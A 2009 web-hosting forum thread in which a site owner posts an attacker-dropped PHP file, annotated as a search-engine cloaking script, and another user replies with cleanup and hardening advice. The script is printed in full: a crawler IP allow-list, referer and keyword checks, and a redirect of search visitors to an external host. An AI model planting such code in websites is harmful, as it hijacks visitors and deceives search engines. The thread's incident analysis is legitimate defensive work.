Someone uploaded subfolder to my hosting account

Discussion in 'Security' started by arrisweb, Nov 29, 2009.

    Hello all,

    Today I noticed a strange subfolder "zxqec" on my hosting account containing PHP and TXT files. The TXT files hold lists of PHP file names (the other files in the same folder).

    One of the PHP files looks like this:

     
    <?php
    // NOTE(review): attacker-dropped script recovered from the "zxqec" folder. It reads as a
    // search-engine cloaking / redirect script: crawlers and direct visitors fall through to
    // the keyword-stuffed HTML that follows the closing tag, while visitors arriving from a
    // Google/Yahoo search result are redirected off-site. Kept verbatim as evidence for the
    // incident write-up — do not deploy it and do not "fix" it.
    //
    // Stage 0: inputs. $ips is a list of IPv4 addresses and address prefixes written as bare
    // strings (no CIDR) that the script treats as crawler sources. The prefixes look like
    // ranges historically announced by Google (64.233/66.249/72.14/74.125/216.239), but that
    // is not verified here.
    $ips = array("209.185.108", "209.185.253", "209.85.238", "209.85.238.11", "209.85.238.4", "216.239.33.96", "216.239.33.97", "216.239.33.98", "216.239.33.99", "216.239.37.98", "216.239.37.99", "216.239.39.98", "216.239.39.99", "216.239.41.96", "216.239.41.97", "216.239.41.98", "216.239.41.99", "216.239.45.4", "216.239.46", "216.239.51.96", "216.239.51.97", "216.239.51.98", "216.239.51.99", "216.239.53.98", "216.239.53.99", "216.239.57.96", "216.239.57.97", "216.239.57.98", "216.239.57.99", "216.239.59.98", "216.239.59.99", "216.33.229.163", "64.233.173.193", "64.233.173.194", "64.233.173.195", "64.233.173.196", "64.233.173.197", "64.233.173.198", "64.233.173.199", "64.233.173.200", "64.233.173.201", "64.233.173.202", "64.233.173.203", "64.233.173.204", "64.233.173.205", "64.233.173.206", "64.233.173.207", "64.233.173.208", "64.233.173.209", "64.233.173.210", "64.233.173.211", "64.233.173.212", "64.233.173.213", "64.233.173.214", "64.233.173.215", "64.233.173.216", "64.233.173.217", "64.233.173.218", "64.233.173.219", "64.233.173.220", "64.233.173.221", "64.233.173.222", "64.233.173.223", "64.233.173.224", "64.233.173.225", "64.233.173.226", "64.233.173.227", "64.233.173.228", "64.233.173.229", "64.233.173.230", "64.233.173.231", "64.233.173.232", "64.233.173.233", "64.233.173.234", "64.233.173.235", "64.233.173.236", "64.233.173.237", "64.233.173.238", "64.233.173.239", "64.233.173.240", "64.233.173.241", "64.233.173.242", "64.233.173.243", "64.233.173.244", "64.233.173.245", "64.233.173.246", "64.233.173.247", "64.233.173.248", "64.233.173.249", "64.233.173.250", "64.233.173.251", "64.233.173.252", "64.233.173.253", "64.233.173.254", "64.233.173.255", "64.68.80", "64.68.81", "64.68.82", "64.68.83", "64.68.84", "64.68.85", "64.68.86", "64.68.87", "64.68.88", "64.68.89", "64.68.90.1", "64.68.90.10", "64.68.90.11", "64.68.90.12", "64.68.90.129", "64.68.90.13", "64.68.90.130", "64.68.90.131", "64.68.90.132", "64.68.90.133", "64.68.90.134", "64.68.90.135", 
"64.68.90.136", "64.68.90.137", "64.68.90.138", "64.68.90.139", "64.68.90.14", "64.68.90.140", "64.68.90.141", "64.68.90.142", "64.68.90.143", "64.68.90.144", "64.68.90.145", "64.68.90.146", "64.68.90.147", "64.68.90.148", "64.68.90.149", "64.68.90.15", "64.68.90.150", "64.68.90.151", "64.68.90.152", "64.68.90.153", "64.68.90.154", "64.68.90.155", "64.68.90.156", "64.68.90.157", "64.68.90.158", "64.68.90.159", "64.68.90.16", "64.68.90.160", "64.68.90.161", "64.68.90.162", "64.68.90.163", "64.68.90.164", "64.68.90.165", "64.68.90.166", "64.68.90.167", "64.68.90.168", "64.68.90.169", "64.68.90.17", "64.68.90.170", "64.68.90.171", "64.68.90.172", "64.68.90.173", "64.68.90.174", "64.68.90.175", "64.68.90.176", "64.68.90.177", "64.68.90.178", "64.68.90.179", "64.68.90.18", "64.68.90.180", "64.68.90.181", "64.68.90.182", "64.68.90.183", "64.68.90.184", "64.68.90.185", "64.68.90.186", "64.68.90.187", "64.68.90.188", "64.68.90.189", "64.68.90.19", "64.68.90.190", "64.68.90.191", "64.68.90.192", "64.68.90.193", "64.68.90.194", "64.68.90.195", "64.68.90.196", "64.68.90.197", "64.68.90.198", "64.68.90.199", "64.68.90.2", "64.68.90.20", "64.68.90.200", "64.68.90.201", "64.68.90.202", "64.68.90.203", "64.68.90.204", "64.68.90.205", "64.68.90.206", "64.68.90.207", "64.68.90.208", "64.68.90.21", "64.68.90.22", "64.68.90.23", "64.68.90.24", "64.68.90.25", "64.68.90.26", "64.68.90.27", "64.68.90.28", "64.68.90.29", "64.68.90.3", "64.68.90.30", "64.68.90.31", "64.68.90.32", "64.68.90.33", "64.68.90.34", "64.68.90.35", "64.68.90.36", "64.68.90.37", "64.68.90.38", "64.68.90.39", "64.68.90.4", "64.68.90.40", "64.68.90.41", "64.68.90.42", "64.68.90.43", "64.68.90.44", "64.68.90.45", "64.68.90.46", "64.68.90.47", "64.68.90.48", "64.68.90.49", "64.68.90.5", "64.68.90.50", "64.68.90.51", "64.68.90.52", "64.68.90.53", "64.68.90.54", "64.68.90.55", "64.68.90.56", "64.68.90.57", "64.68.90.58", "64.68.90.59", "64.68.90.6", "64.68.90.60", "64.68.90.61", "64.68.90.62", "64.68.90.63", 
"64.68.90.64", "64.68.90.65", "64.68.90.66", "64.68.90.67", "64.68.90.68", "64.68.90.69", "64.68.90.7", "64.68.90.70", "64.68.90.71", "64.68.90.72", "64.68.90.73", "64.68.90.74", "64.68.90.75", "64.68.90.76", "64.68.90.77", "64.68.90.78", "64.68.90.79", "64.68.90.8", "64.68.90.80", "64.68.90.9", "64.68.91", "64.68.92", "66.249.64", "66.249.65", "66.249.66", "66.249.67", "66.249.68", "66.249.69", "66.249.70", "66.249.71", "66.249.72", "66.249.73", "66.249.78", "66.249.79", "72.14.199", "8.6.48", "72.14.192", "72.14.193", "72.14.194", "72.14.195", "72.14.196", "72.14.197", "72.14.198", "72.14.199", "72.14.200", "72.14.201", "72.14.202", "72.14.203", "72.14.204", "72.14.205", "72.14.206", "72.14.207", "72.14.208", "72.14.209", "72.14.210", "72.14.211", "72.14.212", "72.14.213", "72.14.214", "72.14.215", "72.14.216", "72.14.217", "72.14.218", "72.14.219", "72.14.220", "72.14.221", "72.14.222", "72.14.223", "72.14.224", "72.14.225", "72.14.226", "72.14.227", "72.14.228", "72.14.229", "72.14.230", "72.14.231", "72.14.232", "72.14.233", "72.14.234", "72.14.235", "72.14.236", "72.14.237", "72.14.238", "72.14.239", "72.14.240", "72.14.241", "72.14.242", "72.14.243", "72.14.244", "72.14.245", "72.14.246", "72.14.247", "72.14.248", "72.14.249", "72.14.250", "72.14.251", "72.14.252", "72.14.253", "72.14.254", "72.14.255", "74.125.0", "74.125.1", "74.125.2", "74.125.3", "74.125.4", "74.125.5", "74.125.6", "74.125.7", "74.125.8", "74.125.9", "74.125.10", "74.125.11", "74.125.12", "74.125.13", "74.125.14", "74.125.15", "74.125.16", "74.125.17", "74.125.18", "74.125.19", "74.125.20", "74.125.21", "74.125.22", "74.125.23", "74.125.24", "74.125.25", "74.125.26", "74.125.27", "74.125.28", "74.125.29", "74.125.30", "74.125.31", "74.125.32", "74.125.33", "74.125.34", "74.125.35", "74.125.36", "74.125.37", "74.125.38", "74.125.39", "74.125.40", "74.125.41", "74.125.42", "74.125.43", "74.125.44", "74.125.45", "74.125.46", "74.125.47", "74.125.48", "74.125.49", "74.125.50", "74.125.51", 
"74.125.52", "74.125.53", "74.125.54", "74.125.55", "74.125.56", "74.125.57", "74.125.58", "74.125.59", "74.125.60", "74.125.61", "74.125.62", "74.125.63", "74.125.64", "74.125.65", "74.125.66", "74.125.67", "74.125.68", "74.125.69", "74.125.70", "74.125.71", "74.125.72", "74.125.73", "74.125.74", "74.125.75", "74.125.76", "74.125.77", "74.125.78", "74.125.79", "74.125.80", "74.125.81", "74.125.82", "74.125.83", "74.125.84", "74.125.85", "74.125.86", "74.125.87", "74.125.88", "74.125.89", "74.125.90", "74.125.91", "74.125.92", "74.125.93", "74.125.94", "74.125.95", "74.125.96", "74.125.97", "74.125.98", "74.125.99", "74.125.100", "74.125.101", "74.125.102", "74.125.103", "74.125.104", "74.125.105", "74.125.106", "74.125.107", "74.125.108", "74.125.109", "74.125.110", "74.125.111", "74.125.112", "74.125.113", "74.125.114", "74.125.115", "74.125.116", "74.125.117", "74.125.118", "74.125.119", "74.125.120", "74.125.121", "74.125.122", "74.125.123", "74.125.124", "74.125.125", "74.125.126", "74.125.127", "74.125.128", "74.125.129", "74.125.130", "74.125.131", "74.125.132", "74.125.133", "74.125.134", "74.125.135", "74.125.136", "74.125.137", "74.125.138", "74.125.139", "74.125.140", "74.125.141", "74.125.142", "74.125.143", "74.125.144", "74.125.145", "74.125.146", "74.125.147", "74.125.148", "74.125.149", "74.125.150", "74.125.151", "74.125.152", "74.125.153", "74.125.154", "74.125.155", "74.125.156", "74.125.157", "74.125.158", "74.125.159", "74.125.160", "74.125.161", "74.125.162", "74.125.163", "74.125.164", "74.125.165", "74.125.166", "74.125.167", "74.125.168", "74.125.169", "74.125.170", "74.125.171", "74.125.172", "74.125.173", "74.125.174", "74.125.175", "74.125.176", "74.125.177", "74.125.178", "74.125.179", "74.125.180", "74.125.181", "74.125.182", "74.125.183", "74.125.184", "74.125.185", "74.125.186", "74.125.187", "74.125.188", "74.125.189", "74.125.190", "74.125.191", "74.125.192", "74.125.193", "74.125.194", "74.125.195", "74.125.196", "74.125.197", 
"74.125.198", "74.125.199", "74.125.200", "74.125.201", "74.125.202", "74.125.203", "74.125.204", "74.125.205", "74.125.206", "74.125.207", "74.125.208", "74.125.209", "74.125.210", "74.125.211", "74.125.212", "74.125.213", "74.125.214", "74.125.215", "74.125.216", "74.125.217", "74.125.218", "74.125.219", "74.125.220", "74.125.221", "74.125.222", "74.125.223", "74.125.224", "74.125.225", "74.125.226", "74.125.227", "74.125.228", "74.125.229", "74.125.230", "74.125.231", "74.125.232", "74.125.233", "74.125.234", "74.125.235", "74.125.236", "74.125.237", "74.125.238", "74.125.239", "74.125.240", "74.125.241", "74.125.242", "74.125.243", "74.125.244", "74.125.245", "74.125.246", "74.125.247", "74.125.248", "74.125.249", "74.125.250", "74.125.251", "74.125.252", "74.125.253", "74.125.254", "74.125.255", "64.233.160", "64.233.161", "64.233.162", "64.233.163", "64.233.164", "64.233.165", "64.233.166", "64.233.167", "64.233.168", "64.233.169", "64.233.170", "64.233.171", "64.233.172", "64.233.173", "64.233.174", "64.233.175", "64.233.176", "64.233.177", "64.233.178", "64.233.179", "64.233.180", "64.233.181", "64.233.182", "64.233.183", "64.233.184", "64.233.185", "64.233.186", "64.233.187", "64.233.188", "64.233.189", "64.233.190", "64.233.191", "66.249.64", "66.249.65", "66.249.66", "66.249.67", "66.249.68", "66.249.69", "66.249.70", "66.249.71", "66.249.72", "66.249.73", "66.249.74", "66.249.75", "66.249.76", "66.249.77", "66.249.78", "66.249.79", "66.249.80", "66.249.81", "66.249.82", "66.249.83", "66.249.84", "66.249.85", "66.249.86", "66.249.87", "66.249.88", "66.249.89", "66.249.90", "66.249.91", "66.249.92", "66.249.93", "66.249.94", "66.249.95");
    // Reads a sidecar file named "1t" from the current working directory. The value is
    // never used anywhere in this script (possibly a leftover, or consumed by a sibling
    // file in the same folder); if "1t" is missing PHP emits a warning and $ths is false.
    $ths = file_get_contents("1t");
    // Client address as the web server saw it. Behind a reverse proxy or load balancer
    // this would be the proxy's address rather than the visitor's — TODO confirm for this
    // host. Note it is compared by substring below, not as a parsed IP.
    $thisip = $_SERVER["REMOTE_ADDR"];
    // "$isbot" effectively means "do NOT redirect": every branch below that wants the
    // visitor to see the page instead of being bounced off-site sets it to true.
    $isbot = false;
    // Top-level-domain suffixes, used in stage 3 to inspect the search keyword.
    $zones = array(".AC", ".AD", ".AE", ".AERO", ".AF", ".AG", ".AI", ".AL", ".AM", ".AN", ".AO", ".AQ", ".AR", ".ARPA", ".AS", ".ASIA", ".AT", ".AU", ".AW", ".AX", ".AZ", ".BA", ".BB", ".BD", ".BE", ".BF", ".BG", ".BH", ".BI", ".BIZ", ".BJ", ".BM", ".BN", ".BO", ".BR", ".BS", ".BT", ".BV", ".BW", ".BY", ".BZ", ".CA", ".CAT", ".CC", ".CD", ".CF", ".CG", ".CH", ".CI", ".CK", ".CL", ".CM", ".CN", ".CO", ".COM", ".COOP", ".CR", ".CU", ".CV", ".CX", ".CY", ".CZ", ".DE", ".DJ", ".DK", ".DM", ".DO", ".DZ", ".EC", ".EDU", ".EE", ".EG", ".ER", ".ES", ".ET", ".EU", ".FI", ".FJ", ".FK", ".FM", ".FO", ".FR", ".GA", ".GB", ".GD", ".GE", ".GF", ".GG", ".GH", ".GI", ".GL", ".GM", ".GN", ".GOV", ".GP", ".GQ", ".GR", ".GS", ".GT", ".GU", ".GW", ".GY", ".HK", ".HM", ".HN", ".HR", ".HT", ".HU", ".ID", ".IE", ".IL", ".IM", ".IN", ".INFO", ".INT", ".IO", ".IQ", ".IR", ".IS", ".IT", ".JE", ".JM", ".JO", ".JOBS", ".JP", ".KE", ".KG", ".KH", ".KI", ".KM", ".KN", ".KP", ".KR", ".KW", ".KY", ".KZ", ".LA", ".LB", ".LC", ".LI", ".LK", ".LR", ".LS", ".LT", ".LU", ".LV", ".LY", ".MA", ".MC", ".MD", ".ME", ".MG", ".MH", ".MIL", ".MK", ".ML", ".MM", ".MN", ".MO", ".MOBI", ".MP", ".MQ", ".MR", ".MS", ".MT", ".MU", ".MUSEUM", ".MV", ".MW", ".MX", ".MY", ".MZ", ".NA", ".NAME", ".NC", ".NE", ".NET", ".NF", ".NG", ".NI", ".NL", ".NO", ".NP", ".NR", ".NU", ".NZ", ".OM", ".ORG", ".PA", ".PE", ".PF", ".PG", ".PH", ".PK", ".PL", ".PM", ".PN", ".PR", ".PRO", ".PS", ".PT", ".PW", ".PY", ".QA", ".RE", ".RO", ".RS", ".RU", ".RW", ".SA", ".SB", ".SC", ".SD", ".SE", ".SG", ".SH", ".SI", ".SJ", ".SK", ".SL", ".SM", ".SN", ".SO", ".SR", ".ST", ".SU", ".SV", ".SY", ".SZ", ".TC", ".TD", ".TEL", ".TF", ".TG", ".TH", ".TJ", ".TK", ".TL", ".TM", ".TN", ".TO", ".TP", ".TR", ".TT", ".TV", ".TW", ".TZ", ".UA", ".UG", ".UK", ".US", ".UY", ".UZ", ".VA", ".VC", ".VE", ".VG", ".VI", ".VN", ".VU", ".WF", ".WS", ".YE", ".YT", ".YU", ".ZA", ".ZM", ".ZW");
    // Stage 1: crawler allow-list. strstr() is a plain substring search, so a prefix such
    // as "64.68.80" also matches "164.68.80.9" or "1.64.68.80" — the list is matched
    // loosely, not by network. There is no break, so the whole list is scanned after a hit.
    for ($i=0; $i<count($ips); $i++)
    {
     $curip = trim($ips[$i]);
     if (strstr($thisip, $curip))
     {
      $isbot = true;
     
     }
    }
     
    // Stage 2: referer gate. Only visitors whose Referer contains "google" or "yahoo"
    // (case-insensitive) remain eligible for the redirect; everyone else — direct hit,
    // another search engine, or no Referer at all — is treated like a crawler and sees the
    // page. HTTP_REFERER is client-supplied and may be absent, which raises an
    // undefined-index notice and leaves $htr null.
    if (!$isbot)
    {
     $htr = $_SERVER["HTTP_REFERER"];
        $flag_g = stristr($htr, "google");
        $flag_y = stristr($htr, "yahoo");
     if (!$flag_g && !$flag_y)
     {
      $isbot = true;
     
     }
    }
    // Stage 3: keyword gate. Pulls the search term out of the referer URL by splitting on
    // "q=" and then "&". This is naive: when "q=" is absent $tmp1[1] is undefined (notice)
    // and $kw is empty, and the value is never URL-decoded. If the term contains any TLD
    // string from $zones (matched case-insensitively as a substring, so ".CO" also hits
    // ".com") the redirect is suppressed — presumably so that searches for a specific site
    // name are not hijacked; that intent is inferred, not stated anywhere. $flag1 is
    // assigned and never read.
    if (!$isbot)
    {
     $tmp1 = explode("q=", $htr);
     $tmp2 = explode("&",$tmp1[1]);
     $kw = $tmp2[0];
     
     $flag1 = false;
     
     for ($i=0; $i<count($zones); $i++)
     {
      $zone = trim($zones[$i]);
      if (stristr($kw, $zone))
      {
       $isbot = true;
          break;
      }
     }
     
     
    }
    // Stage 4: every visitor still eligible is sent to an external host. The "in.cgi?N"
    // shape looks like a traffic-distribution / redirector endpoint, but nothing here
    // shows what the target serves. header("Location: ...") makes PHP answer with a 302;
    // there is no exit(), so the HTML after the closing tag is still emitted, which only
    // crawlers and non-redirected visitors ever render. To confirm the infection from a
    // non-listed IP, a request with a Referer containing "google" and a q= value with no
    // TLD suffix is enough to observe the redirect.
    if (!$isbot)
    {
    header("Location: http://deeprightnews.net/in.cgi?17");
    }
    ?>
    
    After the closing PHP tag comes HTML: hundreds of keywords and links to the other PHP files in the folder (this is what crawlers and non-redirected visitors are served).


    I deleted that folder and changed the password on the hosting account.

    Any thoughts?
     
    arrisweb, Nov 29, 2009 IP
    1.
    use the search function here in the forum;
    there have been plenty of detailed solutions to this kind of compromise posted earlier

    2.
    analyze ALL your old access_log files to find HOW precisely the attackers got into your site — look for the first request that touched the "zxqec" path and for unexpected POST requests to PHP files around that time;
    the entry point may be any of the installed software (forum, etc.)
    whatever software you run, google its name together with "security"
    example (software easymoblog) — google:
    easymoblog security
    do that query for ALL installed software,
    then you will see for ALL your installed scripts whether any security problems are known.

    after you have FOUND the real hole, close it (it may be MUCH more than a simple access password, and it may need many hours of work) — just do it! Deleting one folder does not remove the attacker's foothold: also check for other dropped files, modified .htaccess files, and injected code in your existing scripts (compare modification times around the date of the intrusion).

    then also switch from password login to SSH key-based access (SFTP/SSH) and disable password authentication
    study all the software you have, and make sure you really NEED everything you run

    then, as additional security AFTER the whole site has been cleaned and secured, install mod_security and/or snort

    google is your best friend — search your logs, search google, learn your site and your server;
    you'll need it. Attackers probe every server daily — often several different attackers per day per server
     
    hans, Nov 29, 2009 IP